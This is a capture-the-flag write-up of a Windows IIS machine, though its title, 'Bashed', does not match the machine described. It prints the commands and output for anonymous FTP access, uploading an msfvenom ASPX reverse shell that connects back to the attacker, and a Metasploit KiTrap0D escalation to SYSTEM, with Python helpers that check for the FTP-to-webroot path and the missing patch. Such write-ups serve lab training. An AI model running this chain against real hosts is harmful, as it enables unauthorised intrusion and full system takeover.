Bashed

Machine Level: Easy
OS: Windows

Scanning

I ran an aggressive nmap scan (-A: OS and version detection, default NSE scripts and traceroute) to find the ports and services running on the machine.

ajread@aj-ubuntu:~/hackthebox$ nmap -A [TARGET IP]
Starting Nmap 7.80 ( https://nmap.org ) at 2023-02-08 18:08 EST
Nmap scan report for [TARGET IP]
Host is up (0.013s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 03-17-17  04:37PM                  689 iisstart.htm
|_03-17-17  04:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.80 seconds

Enumeration

I was able to log into the machine with an anonymous ftp logon.

ajread@aj-ubuntu:~/hackthebox$ ftp [TARGET IP]
Connected to [TARGET IP].
220 Microsoft FTP Service
Name ([TARGET IP]:ajread): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||49158|)
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.
ftp> 

The FTP root held the same image and htm as the IIS default page on port 80, which suggested the FTP root is also the webroot. Looking further, the aspnet_client directory gave away the ASP.NET version: IIS creates aspnet_client/system_web/<version> for the client-side scripts of the installed framework, and here that folder was 2_0_50727, i.e. .NET Framework 2.0.50727. Inside aspnet_client:

ftp> dir
229 Entering Extended Passive Mode (|||49160|)
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          system_web
226 Transfer complete.
ftp> cd system_web
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||49161|)
150 Opening ASCII mode data connection.
03-18-17  01:06AM       <DIR>          2_0_50727
226 Transfer complete.
ftp> cd 2_0_50727
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||49163|)
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> 
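Before uploading anything executable it is worth confirming two things the listings above only hint at: what the aspnet_client tree says about the framework version, and whether the anonymous FTP root really is the IIS webroot. The script below is an added example (not code from the original writeup): it parses Microsoft ftpd `dir` output of the form shown above, extracts the ASP.NET version from an aspnet_client path, maps each FTP file to its would-be URL, and, as a live check, uploads a harmless text canary over anonymous FTP and fetches it over HTTP. `SAMPLE_LISTING` is constructed from the listings on this page; the host, canary file name and timeouts in `ftp_root_is_webroot()` are placeholders.

```python
"""Added example, not from the original writeup: parse Microsoft ftpd 'dir'
listings, read the ASP.NET version out of the aspnet_client tree, and check
whether the anonymous FTP root is the IIS webroot.  SAMPLE_LISTING is
constructed from the listings on this page."""
import re
from ftplib import FTP
from io import BytesIO
from urllib.error import HTTPError, URLError
from urllib.request import urlopen

# Microsoft ftpd line: MM-DD-YY  HH:MM{AM|PM}  <DIR>|size  name
# (a leading "| " or "|_" from nmap's ftp-anon output is tolerated)
LISTING_RE = re.compile(
    r"(\d{2}-\d{2}-\d{2})\s+(\d{2}:\d{2}[AP]M)\s+(<DIR>|\d+)\s+(\S.*?)\s*$")

SAMPLE_LISTING = """\
229 Entering Extended Passive Mode (|||49158|)
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.
"""


def parse_iis_listing(text):
    """Return [(name, is_dir, size)] from a Microsoft ftpd 'dir' transcript,
    skipping the 1xx/2xx status lines and ftp> prompts around it."""
    entries = []
    for line in text.splitlines():
        m = LISTING_RE.search(line)
        if not m:
            continue
        _date, _time, kind, name = m.groups()
        is_dir = kind == "<DIR>"
        entries.append((name, is_dir, 0 if is_dir else int(kind)))
    return entries


def aspnet_version_from_path(path):
    """aspnet_client/system_web/2_0_50727 -> '2.0.50727'; None if not that tree.
    IIS creates this folder for the ASP.NET client scripts of the installed
    framework version, so it leaks the version even with no app deployed."""
    m = re.search(r"aspnet_client/system_web/(\d+)_(\d+)_(\d+)",
                  path.replace("\\", "/"))
    return ".".join(m.groups()) if m else None


def webroot_urls(host, entries, scheme="http"):
    """URLs each FTP file would have if the FTP root is the IIS webroot."""
    return [f"{scheme}://{host}/{name}"
            for name, is_dir, _ in entries if not is_dir]


def ftp_root_is_webroot(host, canary="webroot-check.txt", timeout=5):
    """Upload a harmless marker over anonymous FTP and fetch it over HTTP.
    True means IIS serves the FTP root, so an uploaded .aspx would execute.
    storbinary() is deliberate: ASCII-mode transfers rewrite LF to CRLF,
    which corrupts a compiled payload (and is why the writeup's 2848-byte
    aspx arrived as 2888 bytes)."""
    marker = b"ftp-webroot-check\n"                # constructed canary content
    ftp = FTP(host, timeout=timeout)
    ftp.login()                                    # anonymous, empty password
    try:
        ftp.storbinary(f"STOR {canary}", BytesIO(marker))
        try:
            with urlopen(f"http://{host}/{canary}", timeout=timeout) as resp:
                return resp.read() == marker
        except (HTTPError, URLError):
            return False
    finally:
        try:
            ftp.delete(canary)                     # leave nothing behind
        except Exception:
            pass
        ftp.quit()


if __name__ == "__main__":
    entries = parse_iis_listing(SAMPLE_LISTING)
    for name, is_dir, size in entries:
        label = "DIR" if is_dir else str(size)
        print(f"{label:>8}  {name}")
    print("ASP.NET", aspnet_version_from_path("aspnet_client/system_web/2_0_50727"))
    print(webroot_urls("[TARGET IP]", entries))
```

Run `ftp_root_is_webroot("[TARGET IP]")` against a live box only after the offline part agrees with the listings; a `True` there is the real justification for the upload in the next section, and the canary is deleted again whether or not the HTTP fetch succeeds.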

Initial Access

I generated a reverse-shell payload in ASPX with msfvenom:

ajread@aj-ubuntu:~/hackthebox/playground$ sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=[LOCAL IP] LPORT=4444 -f aspx > shell.aspx
[sudo] password for ajread: 
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of aspx file: 2848 bytes

I uploaded the shell through the anonymous FTP logon. The 2888 bytes sent versus the 2848-byte file is the ASCII-mode transfer adding a carriage return to each line (40 lines, 40 bytes); that is harmless for a text payload like this one, but switch to binary mode before putting anything compiled.

ftp> ls
229 Entering Extended Passive Mode (|||49164|)
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.
ftp> put shell.aspx 
local: shell.aspx remote: shell.aspx
229 Entering Extended Passive Mode (|||49165|)
125 Data connection already open; Transfer starting.
100% |*************************************|  2888        9.56 MiB/s    --:-- ETA
226 Transfer complete.
2888 bytes sent in 00:00 (156.60 KiB/s)
ftp> 

I started exploit/multi/handler in Metasploit with the same payload (windows/meterpreter/reverse_tcp), LHOST and LPORT the ASPX was built with, then browsed to http://[TARGET IP]/shell.aspx. IIS compiled and executed the page and a meterpreter session came back to my machine.

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on [LOCAL IP]:4444 
[*] Sending stage (175686 bytes) to [TARGET IP]
[*] Meterpreter session 1 opened ([LOCAL IP]:4444 -> [TARGET IP]:49166) at 2023-02-08 18:27:14 -0500

meterpreter > pwd
c:\windows\system32\inetsrv
meterpreter > 

The ASPX runs as the IIS application pool identity, an unprivileged user, so I backgrounded the session and ran post/multi/recon/local_exploit_suggester against it.

msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run

One suggestion stood out: exploit/windows/local/ms10_015_kitrap0d, which creates a new session with SYSTEM privileges via Tavis Ormandy's KiTrap0D bug (MS10-015, CVE-2010-0232). The module relies on kitrap0d.x86.dll, so it needs a 32-bit meterpreter session on a 32-bit Windows install, which is exactly what the x86 payload above gave me. "Could not be validated" means the suggester matched the OS and architecture but could not confirm the patch level, so the exploit is a candidate rather than a certainty.

[+] [TARGET IP] - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
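When the suggester cannot validate a candidate, the manual check is the patch state: MS10-015 shipped as KB977165, and the Metasploit module only works on 32-bit Windows. The script below is an added example (not part of the original writeup or of Metasploit) that parses a `systeminfo` dump, or the bare KB list from `wmic qfe get HotFixID`, and reports whether KiTrap0D is worth trying. `SAMPLE_SYSTEMINFO` is constructed to resemble a Windows 7 x86 host; its hostname and hotfix numbers are made up.

```python
"""Added example, not part of the original writeup: decide from systeminfo /
wmic qfe output whether MS10-015 (KiTrap0D, CVE-2010-0232) is a candidate:
a 32-bit Windows install without KB977165.  SAMPLE_SYSTEMINFO is constructed."""
import re

MS10_015_KB = "KB977165"            # the update that fixed KiTrap0D
KB_RE = re.compile(r"\bKB\d{6,7}\b")

SAMPLE_SYSTEMINFO = """\
Host Name:                 IIS-WEB01
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
System Type:               X86-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2534111
                           [02]: KB2999226
"""


def parse_systeminfo(text):
    """Extract OS name, system type and installed KBs from systeminfo output.
    Hotfix lines look like '[01]: KB977165'; bare 'KB977165' lines (the
    output of 'wmic qfe get HotFixID') are accepted too, which matters on
    non-English locales where systeminfo's labels are translated."""
    info = {"os": None, "arch": None, "hotfixes": set()}
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.startswith("OS Name:"):
            info["os"] = stripped.split(":", 1)[1].strip()
        elif stripped.startswith("System Type:"):
            info["arch"] = stripped.split(":", 1)[1].strip()
        elif re.match(r"(\[\d+\]:\s*)?KB\d", stripped):
            info["hotfixes"].add(KB_RE.search(stripped).group(0))
    return info


def kitrap0d_candidate(info):
    """Return (candidate, reason).  The Metasploit module relies on
    kitrap0d.x86.dll and refuses native x64 hosts; the session itself must
    also be x86, which the x86 msfvenom payload above already satisfies."""
    arch = info.get("arch") or ""
    if not arch.upper().startswith("X86"):
        return False, f"needs 32-bit Windows, System Type is {arch or 'unknown'}"
    if MS10_015_KB in info["hotfixes"]:
        return False, f"{MS10_015_KB} is installed, MS10-015 is patched"
    return True, f"32-bit {info['os']} without {MS10_015_KB}: try ms10_015_kitrap0d"


if __name__ == "__main__":
    info = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(kitrap0d_candidate(info))
```

Capture `systeminfo` from the meterpreter shell (or `wmic qfe get HotFixID` on a host whose locale translates the systeminfo labels, as the AM/PM markers in the dir output further down suggest this one does) and feed the text to `parse_systeminfo()`. A `True` from `kitrap0d_candidate()` is what turns "could not be validated" into a reasoned attempt; a `False` saves a noisy failed exploit.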

I ran the exploit and was dropped into a privileged shell!

msf6 exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on [LOCAL IP]:7777 
[*] Reflectively injecting payload and triggering the bug...
[*] Launching netsh to host the DLL...
[+] Process 2332 launched.
[*] Reflectively injecting the DLL into 2332...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175686 bytes) to [TARGET IP]
[*] Meterpreter session 2 opened ([LOCAL IP]:7777 -> [TARGET IP]:49167) at 2023-02-08 18:39:11 -0500

meterpreter > pwd
c:\Users
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

Now running as SYSTEM, I could read both the user and root flags from a command shell (the host uses a non-English locale, so the AM/PM marker in the dir output did not survive the terminal encoding):

c:\Users\babis\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 137F-3971

 Directory of c:\Users\babis\Desktop

11/02/2022  03:54       <DIR>          .
11/02/2022  03:54       <DIR>          ..
09/02/2023  01:00                   34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)   4.697.468.928 bytes free

c:\Users\babis\Desktop>
c:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 137F-3971

 Directory of c:\Users\Administrator\Desktop

14/01/2021  11:42       <DIR>          .
14/01/2021  11:42       <DIR>          ..
09/02/2023  01:00                   34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   4.697.468.928 bytes free
